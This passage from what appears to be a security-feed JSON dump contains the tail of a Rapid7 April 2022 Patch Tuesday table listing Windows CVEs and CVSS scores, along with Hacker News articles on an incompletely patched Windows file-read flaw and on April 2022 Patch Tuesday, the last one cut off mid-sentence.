Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26791>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26793>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26795>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24491>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24497>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24487>) | Windows Local Security Authority (LSA) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-24483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24483>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-24545](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24545>) | Windows Kerberos Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-24486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24486>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24490>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-24539](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24539>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-26783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26783>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26785>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-23257](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23257>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-22008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22008>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24537>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-22009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22009>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-23268](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23268>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26920>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-26808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26808>) | Windows File Explorer Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24495](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24495>) | Windows Direct Show - Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2022-24547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24547>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24488>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24546](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24546>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26811>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26823](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26823>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26824>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26825](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26825>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26826](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26826>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26814>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26817](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26817>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26818](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26818>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26816](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26816>) | Windows DNS Server Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-24538](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24538>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-26784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26784>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-24484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24484>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2022-26828](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26828>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24549](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24549>) | Windows AppX Package Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24482>) | Windows ALPC Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26914](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26914>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26788>) | PowerShell Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24496>) | Local Security Authority (LSA) Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24532>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26830>) | DiskUsage.exe Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24479>) | Connected User Experiences and Telemetry Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24489>) | Cluster Client Failover (CCF) Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n### Windows ESU Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24498>) | Windows iSCSI Target Service Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26807>) | Windows Work Folder Service Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24474>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24542](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24542>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26904>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | Yes \n[CVE-2022-24541](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24541>) | Windows Server Service Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-26915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26915>) | Windows Secure Channel Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-24500](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24500>) | Windows SMB Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-26787](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26787>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26790>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26792>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26794>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26796>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26797>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26798>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26801](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26801>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26802>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26803>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26919>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-26831](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26831>) | Windows LDAP Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-24544](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24544>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24530>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24499>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26903>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26810>) | Windows File Server Resource Management Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26827>) | Windows File Server Resource Management Service Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26916>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26917>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26918>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24527>) | Windows Endpoint Configuration Manager Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26812>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26813>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-24536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24536>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26815](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26815>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26819>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26820](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26820>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26821>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26822](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26822>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26829](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26829>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-24521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24521>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2022-24481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24481>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24494>) | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24540](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24540>) | Windows ALPC Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21983>) | Win32 Stream Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24534>) | Win32 Stream Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24485>) | Win32 File Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-26809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26809>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24528](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24528>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-24492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24492>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-24533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24533>) | Remote Desktop Protocol Remote Code Execution Vulnerability | No | No | 8 | Yes \n[CVE-2022-24493](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24493>) | Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:48:11", "type": "rapid7blog", "title": "Patch Tuesday - April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1125", "CVE-2022-1127", "CVE-2022-1128", "CVE-2022-1129", "CVE-2022-1130", "CVE-2022-1131", "CVE-2022-1133", "CVE-2022-1134", "CVE-2022-1135", "CVE-2022-1136", "CVE-2022-1137", "CVE-2022-1138", "CVE-2022-1139", "CVE-2022-1143", "CVE-2022-1145", "CVE-2022-1146", "CVE-2022-1232", "CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23259", "CVE-2022-23268", "CVE-2022-23292", "CVE-2022-24472", "CVE-2022-24473", "CVE-2022-24474", "CVE-2022-24475", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24513", "CVE-2022-24521", "CVE-2022-24523", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24532", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24543", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24548", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-24765", "CVE-2022-24767", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26791", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26891", "CVE-2022-26894", "CVE-2022-26895", "CVE-2022-26896", "CVE-2022-26897", "CVE-2022-26898", "CVE-2022-26900", "CVE-2022-26901", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26907", "CVE-2022-26908", "CVE-2022-26909", "CVE-2022-26910", "CVE-2022-26911", "CVE-2022-26912", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920", "CVE-2022-26921", "CVE-2022-26924"], "modified": "2022-04-12T18:48:11", "id": "RAPID7BLOG:266ADCD22F7AAC05069D569EBF2FEBB9", "href": "https://blog.rapid7.com/2022/04/12/patch-tuesday-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:52", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T09:11:00", "type": "thn", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "modified": "2021-12-03T03:42:06", "id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbZwO6vnWge-kB0sbo0SgRtCUuTnNCYuc3xeMOyHAyjxQuihLyYRfJUPPNnr9Hdgc6BFVncdVwHE2gIRh9I0SI81pValTrymqbOyAXfBo-FmM1Fwi8nQX6E1Djh0A8ozTup2--3iCklRk1LE5r01IA9Jp0rkAwlGLx5wQY7JvMVnb9DA0493CuD7fG/s728-e100/windows-patch-update.jpg>)\n\nMicrosoft's Patch Tuesday updates for the month of April have addressed a [total of 128 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) spanning across its software product portfolio, including Windows, Defender, Office, Exchange Server, Visual Studio, and Print Spooler, among others.\n\n10 of the 128 bugs fixed are rated Critical, 115 are rated Important, and three are rated Moderate in severity, with one of the flaws listed as publicly known and another under active attack at the time of the release.\n\nThe updates are in addition to [26 other flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) resolved by Microsoft in its Chromium-based Edge browser since the start of the month.\n\nThe actively exploited flaw ([CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>), CVSS score: 7.8) relates to an elevation of privilege vulnerability in the Windows Common Log File System (CLFS). Credited with reporting the flaw are the U.S. National Security Agency (NSA) and CrowdStrike researchers Adam Podlosky and Amir Bazine.\n\nThe second publicly-known zero-day flaw ([CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>), CVSS score: 7.0) also concerns a case of privilege escalation in the Windows User Profile Service, successful exploitation 